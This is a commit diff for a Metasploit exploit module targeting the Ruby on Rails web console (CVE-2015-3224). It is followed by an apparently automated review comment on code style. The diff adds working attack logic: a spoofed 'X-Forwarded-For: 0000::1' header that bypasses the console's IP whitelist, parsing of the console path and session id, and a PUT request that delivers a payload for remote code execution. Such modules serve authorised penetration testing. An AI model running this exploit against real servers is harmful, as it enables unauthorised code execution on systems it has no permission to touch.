
Land #6865, Add CVE-2015-3224 support to rails_web_console_v2_code_exec

wchen-r7 3 years ago
parent
commit
13adc3ee0a
1 changed files with 42 additions and 22 deletions
      modules/exploits/multi/http/rails_web_console_v2_code_exec.rb

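--- a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
+++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
@@ -12,24 +12,32 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Ruby on Rails Development Web Console (v2) Code Execution',
+      'Name'           => 'Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution',
       'Description'    => %q{
-          This module exploits a remote code execution feature of the Ruby on Rails
-        framework. This feature is exposed if the config.web_console.whitelisted_ips
-        setting includes untrusted IP ranges and the web-console gem is enabled.
+          This module exploits an IP whitelist bypass vulnerability in the developer
+        web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also
+        achieve code execution on Rails 4.2.x if the attack is launched from a
+        whitelisted IP range.
       },
-      'Author'         => ['hdm'],
+      'Author'         => [
+        'joernchen <joernchen[at]phenoelit.de>', # Discovery & disclosure
+        'Ben Murphy <benmmurphy@gmail.com>',     # Discovery & disclosure
+        'hdm'                                    # Metasploit module
+      ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'https://github.com/rails/web-console' ]
+          [ 'CVE', '2015-3224' ],
+          [ 'URL', 'http://openwall.com/lists/oss-security/2015/06/16/18' ],
+          [ 'URL', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ' ],
+          [ 'URL', 'https://hackerone.com/reports/44513' ]
         ],
       'Platform'       => 'ruby',
       'Arch'           => ARCH_RUBY,
       'Privileged'     => false,
       'Targets'        => [ ['Automatic', {} ] ],
       'DefaultOptions' => { 'PrependFork' => true },
-      'DisclosureDate' => 'May 2 2016',
+      'DisclosureDate' => 'Jun 16 2015',
       'DefaultTarget' => 0))
 
     register_options(
@@ -45,7 +53,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     res = send_request_cgi({
       'uri'     => normalize_uri(target_uri.path),
-      'method'  => 'GET'
+      'method'  => 'GET',
+      'headers' => {
+        'X-Forwarded-For' => '0000::1'
+      }
     }, 25)
 
     unless res
@@ -53,29 +64,38 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    unless res.body.to_s =~ /data-mount-point='([^']+)'/
-      if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
-        print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
-      else
-        print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
-      end
-      return
+    web_console_path = nil
+
+    # Support vulnerable Web Console versions
+    if res.body.to_s =~ /data-remote-path='([^']+)'/
+      web_console_path = "/" + $1
     end
 
-    console_path = normalize_uri($1, 'repl_sessions')
+    # Support newer Web Console versions
+    if web_console_path.nil? && res.body.to_s =~ /data-mount-point='([^']+)'/
+      web_console_mount = $1
+      unless res.body.to_s =~ /data-session-id='([^']+)'/
+        print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
+        return
+      end
+      web_console_path = normalize_uri(web_console_mount, 'repl_sessions', $1)
+    end
 
-    unless res.body.to_s =~ /data-session-id='([^']+)'/
-      print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
+    unless web_console_path
+      if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
+        print_error('Error: The web console is patched, disabled, or you are not in the whitelisted scope')
+      else
+        print_error("Error: No web console path found when requesting #{datastore['TARGETURI']}")
+      end
       return
     end
 
-    session_id = $1
-
-    print_status("Sending payload to #{console_path}/#{session_id}")
+    print_status("Sending payload to #{web_console_path}")
     res = send_request_cgi({
-      'uri'       => normalize_uri(console_path, session_id),
+      'uri'       => web_console_path,
       'method'    => 'PUT',
       'headers'   => {
+        'X-Forwarded-For'  => '0000::1',
         'Accept'           => 'application/vnd.web-console.v2',
         'X-Requested-With' => 'XMLHttpRequest'
       },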
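Review bot: The two ways of building `web_console_path` in the third hunk are not consistent — the `data-remote-path` branch concatenates `"/" + $1` while the `data-mount-point` branch goes through `normalize_uri`, so if the captured attribute already carries a leading slash the first branch yields a `//`-prefixed path; `web_console_path = normalize_uri($1)` would treat both branches the same way (the exact attribute format is not visible here, so confirm against a real response). The `$1` passed to `normalize_uri(web_console_mount, 'repl_sessions', $1)` refers to the session-id match made in the preceding `unless`, several lines earlier; capturing it immediately (`session_id = $1` right after the match, or `Regexp.last_match(1)`) makes that dependency explicit and survives a later inserted `=~`. The `'X-Forwarded-For' => '0000::1'` header now appears in both requests; hoisting it into one frozen constant with a short comment on why this particular value is sent keeps the two requests in sync. `res.body.to_s` is also recomputed five times in this hunk and could be bound once to a local such as `body = res.body.to_s`. The `exploit` method continues past the end of the hunk.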
